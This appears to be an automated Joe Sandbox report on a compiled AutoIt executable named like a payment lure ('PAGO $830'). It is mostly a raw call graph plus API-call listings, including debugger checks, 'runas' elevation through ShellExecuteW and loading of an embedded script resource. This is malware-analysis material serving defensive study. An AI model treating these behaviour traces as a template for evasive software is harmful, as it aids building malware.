__alldvrm 92284->92289 92292 da32cf 11 API calls 2 library calls 92284->92292 92286 d9e40d 92291 da277c 26 API calls _strftime 92286->92291 92289->92281 92290->92286 92291->92289 92292->92289 92293->92042 92294->92056 92295->92058 92296->92055 92298 d8fd5b 22 API calls 92297->92298 92299 d74a23 92298->92299 92299->92066 92301 d7c91b 92300->92301 92302 dc0728 92301->92302 92307 d7c923 messages 92301->92307 92303 d8fd5b 22 API calls 92302->92303 92304 dc0734 92303->92304 92305 d7c92a 92305->92068 92307->92305 92308 d7c990 22 API calls messages 92307->92308 92308->92307 92309->92074 92310->92077 92316 de2d98 92311->92316 92312 d76a95 40 API calls 92312->92316 92313 de2c59 92313->92088 92313->92089 92314 de281c 27 API calls 92314->92316 92315 d76abf 64 API calls 92315->92316 92316->92312 92316->92313 92316->92314 92316->92315 92317->92088 92319 d9e614 ___scrt_is_nonwritable_in_current_image 92318->92319 92320 d9e63a 92319->92320 92321 d9e625 92319->92321 92330 d9e635 __fread_nolock 92320->92330 92331 d9911d EnterCriticalSection 92320->92331 92348 d9f269 20 API calls _abort 92321->92348 92323 d9e62a 92349 da277c 26 API calls _strftime 92323->92349 92326 d9e656 92332 d9e592 92326->92332 92328 d9e661 92350 d9e67e LeaveCriticalSection __fread_nolock 92328->92350 92330->92110 92331->92326 92333 d9e59f 92332->92333 92334 d9e5b4 92332->92334 92383 d9f269 20 API calls _abort 92333->92383 92339 d9e5af 92334->92339 92351 d9db9b 92334->92351 92336 d9e5a4 92384 da277c 26 API calls _strftime 92336->92384 92339->92328 92344 d9e5d6 92368 da85cf 92344->92368 92347 da2958 _free 20 API calls 92347->92339 92348->92323 92349->92330 92350->92330 92352 d9dbaf 92351->92352 92353 d9dbb3 92351->92353 92357 da4d0a 92352->92357 92353->92352 92354 d9d8e5 __fread_nolock 26 API calls 92353->92354 92355 d9dbd3 92354->92355 92385 da594e 92355->92385 92358 da4d20 92357->92358 92359 d9e5d0 92357->92359 92358->92359 92360 da2958 _free 20 API calls 92358->92360 92361 d9d8e5 92359->92361 92360->92359 
92362 d9d8f1 92361->92362 92363 d9d906 92361->92363 92496 d9f269 20 API calls _abort 92362->92496 92363->92344 92365 d9d8f6 92497 da277c 26 API calls _strftime 92365->92497 92367 d9d901 92367->92344 92369 da85de 92368->92369 92370 da85f3 92368->92370 92501 d9f256 20 API calls _abort 92369->92501 92372 da862e 92370->92372 92376 da861a 92370->92376 92503 d9f256 20 API calls _abort 92372->92503 92373 da85e3 92502 d9f269 20 API calls _abort 92373->92502 92498 da85a7 92376->92498 92377 da8633 92504 d9f269 20 API calls _abort 92377->92504 92380 da863b 92505 da277c 26 API calls _strftime 92380->92505 92381 d9e5dc 92381->92339 92381->92347 92383->92336 92384->92339 92386 da595a ___scrt_is_nonwritable_in_current_image 92385->92386 92387 da597a 92386->92387 92388 da5962 92386->92388 92389 da5a18 92387->92389 92394 da59af 92387->92394 92464 d9f256 20 API calls _abort 92388->92464 92469 d9f256 20 API calls _abort 92389->92469 92392 da5967 92465 d9f269 20 API calls _abort 92392->92465 92393 da5a1d 92470 d9f269 20 API calls _abort 92393->92470 92410 da50d7 EnterCriticalSection 92394->92410 92398 da5a25 92471 da277c 26 API calls _strftime 92398->92471 92399 da59b5 92401 da59d1 92399->92401 92402 da59e6 92399->92402 92466 d9f269 20 API calls _abort 92401->92466 92411 da5a39 92402->92411 92405 da59d6 92467 d9f256 20 API calls _abort 92405->92467 92406 da596f __fread_nolock 92406->92352 92407 da59e1 92468 da5a10 LeaveCriticalSection __wsopen_s 92407->92468 92410->92399 92412 da5a67 92411->92412 92452 da5a60 92411->92452 92413 da5a8a 92412->92413 92414 da5a6b 92412->92414 92417 da5adb 92413->92417 92418 da5abe 92413->92418 92479 d9f256 20 API calls _abort 92414->92479 92415 d90a0c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 92419 da5c41 92415->92419 92422 da5af1 92417->92422 92485 da93c4 28 API calls __fread_nolock 92417->92485 92482 d9f256 20 API calls _abort 92418->92482 92419->92407 92420 da5a70 
92480 d9f269 20 API calls _abort 92420->92480 92472 da55de 92422->92472 92425 da5ac3 92483 d9f269 20 API calls _abort 92425->92483 92427 da5a77 92481 da277c 26 API calls _strftime 92427->92481 92431 da5b38 92437 da5b4c 92431->92437 92438 da5b92 WriteFile 92431->92438 92432 da5aff 92434 da5b03 92432->92434 92435 da5b25 92432->92435 92433 da5acb 92484 da277c 26 API calls _strftime 92433->92484 92439 da5bf9 92434->92439 92486 da5571 GetLastError WriteConsoleW CreateFileW __wsopen_s 92434->92486 92487 da53be 45 API calls 3 library calls 92435->92487 92442 da5b82 92437->92442 92443 da5b54 92437->92443 92441 da5bb5 GetLastError 92438->92441 92448 da5b1b 92438->92448 92439->92452 92494 d9f269 20 API calls _abort 92439->92494 92441->92448 92490 da5654 7 API calls 2 library calls 92442->92490 92444 da5b59 92443->92444 92445 da5b72 92443->92445 92444->92439 92449 da5b62 92444->92449 92489 da5821 8 API calls 2 library calls 92445->92489 92448->92439 92448->92452 92456 da5bd5 92448->92456 92488 da5733 7 API calls 2 library calls 92449->92488 92451 da5b70 92451->92448 92452->92415 92455 da5c1e 92495 d9f256 20 API calls _abort 92455->92495 92457 da5bdc 92456->92457 92458 da5bf0 92456->92458 92491 d9f269 20 API calls _abort 92457->92491 92493 d9f233 20 API calls __dosmaperr 92458->92493 92462 da5be1 92492 d9f256 20 API calls _abort 92462->92492 92464->92392 92465->92406 92466->92405 92467->92407 92468->92406 92469->92393 92470->92398 92471->92406 92473 daf83c __fread_nolock 26 API calls 92472->92473 92475 da55ee 92473->92475 92474 da55f3 92474->92431 92474->92432 92475->92474 92476 da2d04 _abort 38 API calls 92475->92476 92477 da5616 92476->92477 92477->92474 92478 da5634 GetConsoleMode 92477->92478 92478->92474 92479->92420 92480->92427 92481->92452 92482->92425 92483->92433 92484->92452 92485->92422 92486->92448 92487->92448 92488->92451 92489->92451 92490->92451 92491->92462 92492->92452 92493->92452 92494->92455 92495->92452 92496->92365 92497->92367 92506 da8525 92498->92506 
92500 da85cb 92500->92381 92501->92373 92502->92381 92503->92377 92504->92380 92505->92381 92507 da8531 ___scrt_is_nonwritable_in_current_image 92506->92507 92517 da50d7 EnterCriticalSection 92507->92517 92509 da853f 92510 da8571 92509->92510 92511 da8566 92509->92511 92533 d9f269 20 API calls _abort 92510->92533 92518 da864e 92511->92518 92514 da856c 92534 da859b LeaveCriticalSection __wsopen_s 92514->92534 92516 da858e __fread_nolock 92516->92500 92517->92509 92519 da5354 __wsopen_s 26 API calls 92518->92519 92522 da865e 92519->92522 92520 da8664 92521 da52c3 __wsopen_s 21 API calls 92520->92521 92524 da86bc 92521->92524 92522->92520 92523 da8696 92522->92523 92525 da5354 __wsopen_s 26 API calls 92522->92525 92523->92520 92526 da5354 __wsopen_s 26 API calls 92523->92526 92527 da86de 92524->92527 92530 d9f233 __dosmaperr 20 API calls 92524->92530 92528 da868d 92525->92528 92529 da86a2 CloseHandle 92526->92529 92527->92514 92531 da5354 __wsopen_s 26 API calls 92528->92531 92529->92520 92532 da86ae GetLastError 92529->92532 92530->92527 92531->92523 92532->92520 92533->92514 92534->92516 92593 db1ef0 92535->92593 92538 d75974 92599 d7bfbf 92538->92599 92539 d75959 92540 d784e7 22 API calls 92539->92540 92542 d75965 92540->92542 92595 d7562b 92542->92595 92545 d747d0 92546 db1ef0 __wsopen_s 92545->92546 92547 d747dd GetLongPathNameW 92546->92547 92548 d784e7 22 API calls 92547->92548 92549 d74805 92548->92549 92550 d75489 92549->92550 92551 d7c25d 22 API calls 92550->92551 92552 d7549b 92551->92552 92553 d7592d 23 API calls 92552->92553 92554 d754a6 92553->92554 92555 db404a 92554->92555 92556 d754b1 92554->92556 92560 db406c 92555->92560 92615 d8d5dc 41 API calls 92555->92615 92558 d76aff 22 API calls 92556->92558 92559 d754bd 92558->92559 92609 d7285a 92559->92609 92562 d754d0 92562->91937 92564 d7686d 94 API calls 92563->92564 92565 d7634d 92564->92565 92566 db456a 92565->92566 92568 d7686d 94 API calls 92565->92568 92567 de2c17 80 API calls 92566->92567 92569 
db457f 92567->92569 92570 d76361 92568->92570 92571 db4583 92569->92571 92572 db45a0 92569->92572 92570->92566 92573 d76369 92570->92573 92574 d768db 68 API calls 92571->92574 92575 d8fd8b 22 API calls 92572->92575 92576 db458b 92573->92576 92577 d76375 92573->92577 92574->92576 92583 db45e5 92575->92583 92719 ddd978 82 API calls 92576->92719 92616 d7ad7c 92577->92616 92580 d744e2 92580->91797 92580->91800 92581 db4599 92581->92572 92582 db4796 92585 db479e 92582->92585 92583->92582 92583->92585 92590 d7b606 22 API calls 92583->92590 92720 dd959c 22 API calls __fread_nolock 92583->92720 92721 dd94cb 42 API calls _wcslen 92583->92721 92722 de0a78 22 API calls 92583->92722 92723 d7bd9d 22 API calls __fread_nolock 92583->92723 92724 d75e82 22 API calls 92583->92724 92584 d768db 68 API calls 92584->92585 92585->92584 92725 dd97b9 82 API calls __wsopen_s 92585->92725 92590->92583 92594 d7593a GetFullPathNameW 92593->92594 92594->92538 92594->92539 92596 d75639 92595->92596 92605 d7ad22 92596->92605 92598 d7483d 92598->92545 92600 d7bfcc 92599->92600 92601 d7bfd9 92599->92601 92600->92542 92602 d8fd5b 22 API calls 92601->92602 92603 d7bfe3 92602->92603 92604 d8fd8b 22 API calls 92603->92604 92604->92600 92606 d7ad30 92605->92606 92608 d7ad39 __fread_nolock 92605->92608 92607 d7c7c9 22 API calls 92606->92607 92606->92608 92607->92608 92608->92598 92610 d7286c 92609->92610 92614 d7288b __fread_nolock 92609->92614 92613 d8fd8b 22 API calls 92610->92613 92611 d8fd5b 22 API calls 92612 d728a2 92611->92612 92612->92562 92613->92614 92614->92611 92615->92555 92617 d7ada5 92616->92617 92618 dbf9b1 92616->92618 92619 d8fd8b 22 API calls 92617->92619 92796 dd97b9 82 API calls __wsopen_s 92618->92796 92621 d7adc9 92619->92621 92622 d77bee CloseHandle 92621->92622 92623 d7add7 92622->92623 92624 d7c25d 22 API calls 92623->92624 92627 d7ade0 92624->92627 92625 d7ae3d 92629 d7c25d 22 API calls 92625->92629 92626 d7ae2f 92626->92625 92628 dbf9cb 92626->92628 92797 ddcc1d 
SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 92626->92797 92630 d77bee CloseHandle 92627->92630 92628->92625 92628->92626 92631 d7ae49 92629->92631 92633 d7ade9 92630->92633 92726 d8f962 92631->92726 92636 d77bee CloseHandle 92633->92636 92635 dbfa27 92635->92625 92638 d7adf2 92636->92638 92744 d770e5 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 92638->92744 92639 d7c25d 22 API calls 92642 d7ae61 92639->92642 92641 d7ae0c 92643 d7ae14 92641->92643 92644 dbfde7 92641->92644 92645 d7592d 23 API calls 92642->92645 92745 d76d7e 27 API calls messages 92643->92745 92810 dd97b9 82 API calls __wsopen_s 92644->92810 92646 d7ae6f 92645->92646 92731 d8f945 92646->92731 92648 dbfdfc 92648->92648 92653 d7ae26 92746 d76d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 92653->92746 92656 d7aeb2 92657 d7c25d 22 API calls 92656->92657 92659 d7aebb 92657->92659 92658 dbfa3d 92660 d77bee CloseHandle 92658->92660 92662 d7c25d 22 API calls 92659->92662 92661 dbfa46 92660->92661 92663 d7686d 94 API calls 92661->92663 92664 d7aec4 92662->92664 92665 dbfa6e 92663->92665 92747 d76bff 92664->92747 92667 dbfd7e 92665->92667 92670 de2c17 80 API calls 92665->92670 92807 dd97b9 82 API calls __wsopen_s 92667->92807 92668 d7aedb 92671 d77cf8 22 API calls 92668->92671 92672 dbfa91 92670->92672 92673 d7aeec SetCurrentDirectoryW 92671->92673 92674 d768db 68 API calls 92672->92674 92677 d7aeff 92673->92677 92675 dbfa9f 92674->92675 92675->92667 92676 dbfaa7 92675->92676 92678 d8fd5b 22 API calls 92676->92678 92679 d8fd8b 22 API calls 92677->92679 92680 dbfacf 92678->92680 92682 d7af12 92679->92682 92798 d7bd9d 22 API calls __fread_nolock 92680->92798 92684 d770c2 22 API calls 92682->92684 92683 d7b08a 92686 d77bee CloseHandle 92683->92686 92714 d7af1d _wcslen 92684->92714 92690 d7b09c 92686->92690 92687 d7b035 92688 dbfceb 92804 de09ea 22 API calls 92688->92804 92690->92580 92695 dbfd11 92805 dd40c5 22 API calls __fread_nolock 92695->92805 92699 
dbfdca 92704 d7b058 messages 92740 d77bee 92704->92740 92708 d7b606 22 API calls 92708->92714 92709 d7b606 22 API calls 92716 dbfb10 92709->92716 92713 dbfd53 92806 dd97b9 82 API calls __wsopen_s 92713->92806 92714->92687 92714->92699 92714->92708 92789 d7b0d9 33 API calls 92714->92789 92790 d78fd0 GetStringTypeW 92714->92790 92791 d7901d 40 API calls 92714->92791 92792 d790bd GetStringTypeW _wcslen 92714->92792 92716->92688 92716->92709 92716->92713 92799 dd959c 22 API calls __fread_nolock 92716->92799 92800 dd94cb 42 API calls _wcslen 92716->92800 92801 de0a78 22 API calls 92716->92801 92802 d7bd9d 22 API calls __fread_nolock 92716->92802 92803 d78f2c 22 API calls 92716->92803 92718 dbfd6c 92718->92704 92719->92581 92720->92583 92721->92583 92722->92583 92723->92583 92724->92583 92725->92585 92727 db1ef0 __wsopen_s 92726->92727 92728 d8f96f GetCurrentDirectoryW 92727->92728 92729 d784e7 22 API calls 92728->92729 92730 d7ae55 92729->92730 92730->92639 92811 d7b3b0 92731->92811 92734 d76e66 92739 d76e7d 92734->92739 92735 db4b49 SetFilePointerEx 92736 d76f04 SetFilePointerEx SetFilePointerEx 92738 d76ed0 92736->92738 92737 db4b38 92737->92735 92738->92656 92738->92658 92739->92735 92739->92736 92739->92737 92739->92738 92741 d77c07 92740->92741 92742 d77bf8 92740->92742 92741->92742 92743 d77c0c CloseHandle 92741->92743 92742->92683 92743->92742 92744->92641 92745->92653 92746->92626 92748 d7c25d 22 API calls 92747->92748 92749 d76c15 92748->92749 92750 d7c25d 22 API calls 92749->92750 92751 d76c1d 92750->92751 92752 d7c25d 22 API calls 92751->92752 92753 d76c25 92752->92753 92754 d7c25d 22 API calls 92753->92754 92755 d76c2d 92754->92755 92756 d76c61 92755->92756 92757 db49a2 92755->92757 92759 d786ac 22 API calls 92756->92759 92758 d7c1c3 22 API calls 92757->92758 92760 db49ab 92758->92760 92761 d76c6f 92759->92761 92762 d7bfbf 22 API calls 92760->92762 92763 d7ad22 22 API calls 92761->92763 92766 d76ca4 92762->92766 92764 d76c79 92763->92764 92765 d786ac 22 API 
calls 92764->92765 92764->92766 92770 d76c9a 92765->92770 92767 d76ce9 92766->92767 92768 d76cc5 92766->92768 92784 db49cd 92766->92784 92819 d786ac 92767->92819 92768->92767 92774 d7660f 22 API calls 92768->92774 92772 d7ad22 22 API calls 92770->92772 92771 d76cfa 92773 d76d10 92771->92773 92778 d7c1c3 22 API calls 92771->92778 92772->92766 92775 d76d24 92773->92775 92780 d7c1c3 22 API calls 92773->92780 92776 d76cd2 92774->92776 92779 d76d2f 92775->92779 92782 d7c1c3 22 API calls 92775->92782 92776->92767 92781 d786ac 22 API calls 92776->92781 92777 d784e7 22 API calls 92786 db4a8d 92777->92786 92778->92773 92783 d7c1c3 22 API calls 92779->92783 92787 d76d3a 92779->92787 92780->92775 92781->92767 92782->92779 92783->92787 92784->92777 92785 d7660f 22 API calls 92785->92786 92786->92767 92786->92785 92832 d751ec 22 API calls __fread_nolock 92786->92832 92787->92668 92789->92714 92790->92714 92791->92714 92792->92714 92796->92626 92797->92635 92798->92716 92799->92716 92800->92716 92801->92716 92802->92716 92803->92716 92804->92695 92805->92704 92806->92718 92807->92718 92810->92648 92812 d7b3be 92811->92812 92813 d7b42b 92811->92813 92815 d7ae95 92812->92815 92816 d7b3fc ReadFile 92812->92816 92818 d8e3db SetFilePointerEx 92813->92818 92815->92734 92816->92815 92817 d7b416 92816->92817 92817->92812 92817->92815 92818->92812 92820 d786bb 92819->92820 92821 d78718 92819->92821 92820->92821 92823 d786c6 92820->92823 92822 d7ad22 22 API calls 92821->92822 92829 d786e9 __fread_nolock 92822->92829 92824 d786e1 92823->92824 92825 db5873 92823->92825 92833 d788bb 22 API calls 92824->92833 92826 d8fd5b 22 API calls 92825->92826 92828 db587d 92826->92828 92830 d8fd8b 22 API calls 92828->92830 92829->92771 92831 db58b0 92830->92831 92832->92786 92833->92829 92834->91949 92836 d75d0d 92835->92836 92845 d75e2a 92835->92845 92837 d8fd8b 22 API calls 92836->92837 92836->92845 92839 d75d34 92837->92839 92838 d8fd8b 22 API calls 92843 d75da9 92838->92843 92839->92838 92843->92845 
Call graph (Joe Sandbox rendering; the interactive figure survives only as its node and edge text). In the dump each node is a five-digit id followed by a function address inside the main image (0xd71033-0xe028f2), an optional "N API calls" count and the Win32 or CRT symbols the function reaches; "A->B" tokens are caller->callee edges. Win32 APIs visible in the graph, grouped by purpose:

Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
Files: GetFileAttributesW, FindFirstFileW, FindClose, GetFullPathNameW, CreateFileW, GetFileType, CopyFileW, DeleteFileW, SetFileTime, GetTempPathW, GetTempFileNameW
Process and synchronisation: GetCurrentProcess, TerminateProcess, GetExitCodeProcess, WaitForSingleObject, DuplicateHandle, CreateThread, CloseHandle, GetStdHandle, InitializeCriticalSectionAndSpinCount, InterlockedExchange, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent
Environment probing: GetVersionExW, IsWow64Process, GetSystemInfo, GetNativeSystemInfo (resolved through LoadLibraryA and GetProcAddress, followed by FreeLibrary), GetPEB
Timing: timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep
Memory: VirtualProtect
Message loop and tray UI: PeekMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, GetInputState, GetForegroundWindow, DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus, DestroyWindow, DeleteObject, Shell_NotifyIconW, LoadStringW, DestroyIcon, CharLowerBuffW, lstrlenW, OleInitialize, GetLastError

A small cluster of nodes at 0x13bea58-0x13c1f22, outside the main image's address range, reaches GetPEB and Sleep. The remaining labels (__fread_nolock, __wsopen_s, _wcslen, _strftime, _abort, __onexit, __Init_thread_wait, ___scrt_fastfail) are C runtime helpers.

                                                          Control-flow Graph

                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00D7618D
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • GetCurrentProcess.KERNEL32(?,00E0D030,00000000,?,?), ref: 00D762A2
                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D762A9
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D762D4
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D762E6
                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D762F4
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D762FB
                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00D76320
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                          • API String ID: 3290436268-3101561225
                                                          • Opcode ID: 78d03f3a7df0328cd2a998b9879b3af4f9dc7d1c9a3a3f134fdd3fddf81e1914
                                                          • Instruction ID: 2622655ac83ff8dc57a73eef2bdd1cc7e37a72dd93bc1de0501769a8b668118b
                                                          • Opcode Fuzzy Hash: 78d03f3a7df0328cd2a998b9879b3af4f9dc7d1c9a3a3f134fdd3fddf81e1914
                                                          • Instruction Fuzzy Hash: 31A1542A90A7C0CFCF11CFAA7C441D57FA46B67344B1A58E9E48573A27F260858ECB35

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D736D8,?), ref: 00D7448D
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D736D8,?), ref: 00D744A0
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E41418,00E41400,?,?,?,?,?,?,00D736D8,?), ref: 00D74515
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                            • Part of subcall function 00D736FB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D7453D,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00D7373C
                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00D74596
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E359B8,00000010), ref: 00DB371C
                                                          • SetCurrentDirectoryW.KERNEL32(?,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00DB3769
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E32244,00E41418,?,?,?,?,?,?,?,00D736D8), ref: 00DB37F2
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DB37F9
                                                            • Part of subcall function 00D745AE: GetSysColorBrush.USER32(0000000F), ref: 00D745B9
                                                            • Part of subcall function 00D745AE: LoadCursorW.USER32(00000000,00007F00), ref: 00D745C8
                                                            • Part of subcall function 00D745AE: LoadIconW.USER32(00000063), ref: 00D745DE
                                                            • Part of subcall function 00D745AE: LoadIconW.USER32(000000A4), ref: 00D745F0
                                                            • Part of subcall function 00D745AE: LoadIconW.USER32(000000A2), ref: 00D74602
                                                            • Part of subcall function 00D745AE: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D7461A
                                                            • Part of subcall function 00D745AE: RegisterClassExW.USER32(?), ref: 00D7466B
                                                            • Part of subcall function 00D7468E: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D746BC
                                                            • Part of subcall function 00D7468E: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D746DD
                                                            • Part of subcall function 00D7468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746F1
                                                            • Part of subcall function 00D7468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746FA
                                                            • Part of subcall function 00D756C2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D75793
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                          • String ID: This is a third-party compiled AutoIt script.$runas$Y
                                                          • API String ID: 683915450-3870070793
                                                          • Opcode ID: 622ff47ef4ce70fa9bf0dbd6abab05fa3e6b8d13b8ab5d350b93348f22e5204d
                                                          • Instruction ID: 18bb15fde16b3a8a1a60db08dcbaea0304257f06e2b3de827345c2013181d4cc
                                                          • Opcode Fuzzy Hash: 622ff47ef4ce70fa9bf0dbd6abab05fa3e6b8d13b8ab5d350b93348f22e5204d
                                                          • Instruction Fuzzy Hash: A5512975108341AFCB11EF61EC069BE7BA8DB85750F44455DF495621A2EF20898EDB32

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00D76A4A,?,?,00000000,00000000), ref: 00D76132
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D76A4A,?,?,00000000,00000000), ref: 00D76149
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00D76A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D768C2), ref: 00DB42F5
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00D76A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D768C2), ref: 00DB430A
                                                          • LockResource.KERNEL32(00D76A4A,?,?,00D76A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D768C2,?), ref: 00DB431D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: b72cb6e6937f26175471539222f09d4b3cd37278fd3eeec876d230d6f9142c03
                                                          • Instruction ID: 789fc523996cc0fc62ba0056a71e1b57ff344252fba809ae753a9b5660e676e2
                                                          • Opcode Fuzzy Hash: b72cb6e6937f26175471539222f09d4b3cd37278fd3eeec876d230d6f9142c03
                                                          • Instruction Fuzzy Hash: 7A11A070200B01BFD7218B66DC49F277BB9EBC5B41F24862CB50AA66A1EB71DC408631
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00DB5DF8), ref: 00DDDAEC
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00DDDAFB
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00DDDB0C
                                                          • FindClose.KERNEL32(00000000), ref: 00DDDB18
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                          • String ID:
                                                          • API String ID: 2695905019-0
                                                          • Opcode ID: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                                          • Instruction ID: 7c150a6f16d20d0c12cf6d5a4405fd71de4af4f15ec342973663252198b1b124
                                                          • Opcode Fuzzy Hash: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                                          • Instruction Fuzzy Hash: 20F0A032410A105BC61067B8AC0DCAA3ABDDF02338B254707F875D26F1D771999846A5
                                                          APIs
                                                          • GetInputState.USER32 ref: 00D7F107
                                                          • timeGetTime.WINMM ref: 00D7F307
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7F428
                                                          • TranslateMessage.USER32(?), ref: 00D7F47B
                                                          • DispatchMessageW.USER32(?), ref: 00D7F489
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7F49F
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00D7F4B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
